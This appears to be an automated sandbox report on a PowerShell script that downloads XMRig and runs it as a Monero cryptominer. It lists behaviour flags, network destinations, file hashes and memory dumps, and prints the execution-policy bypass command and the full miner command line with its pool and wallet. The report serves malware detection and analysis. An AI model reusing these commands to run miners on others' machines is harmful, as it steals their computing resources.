N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/4172-0-0x00007FFB47993000-0x00007FFB47995000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43hcyhvc.pmu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4172-6-0x0000022CE0E70000-0x0000022CE0E92000-memory.dmp

memory/4172-11-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4172-12-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4172-14-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4172-15-0x0000022CE1260000-0x0000022CE1272000-memory.dmp

memory/4172-16-0x0000022CE1240000-0x0000022CE124A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4064-47-0x000001409A910000-0x000001409A930000-memory.dmp

memory/4172-48-0x0000022CE0B20000-0x0000022CE0D3C000-memory.dmp

memory/4064-49-0x000001409C250000-0x000001409C270000-memory.dmp

memory/4064-51-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-55-0x000001409C290000-0x000001409C2B0000-memory.dmp

memory/4064-54-0x000001409C270000-0x000001409C290000-memory.dmp

memory/4172-53-0x00007FFB47993000-0x00007FFB47995000-memory.dmp

memory/4064-52-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4172-56-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4064-57-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4172-58-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4064-59-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-61-0x000001409C290000-0x000001409C2B0000-memory.dmp

memory/4064-60-0x000001409C270000-0x000001409C290000-memory.dmp

memory/4064-62-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-63-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-64-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-65-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-66-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-67-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-68-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-69-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-70-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-71-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-72-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-73-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-74-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-75-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-76-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-77-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-78-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-79-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-80-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-81-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-82-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-83-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-84-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-85-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-86-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-87-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-88-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-89-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-90-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-91-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-92-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-93-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-94-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-95-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-96-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-97-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-98-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-99-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-100-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-101-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-102-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-103-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-104-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-105-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-106-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-107-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-108-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-109-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-110-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-111-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-112-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-113-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-114-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-115-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-116-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-117-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-118-0x00007FF697B20000-0x00007FF698753000-memory.dmp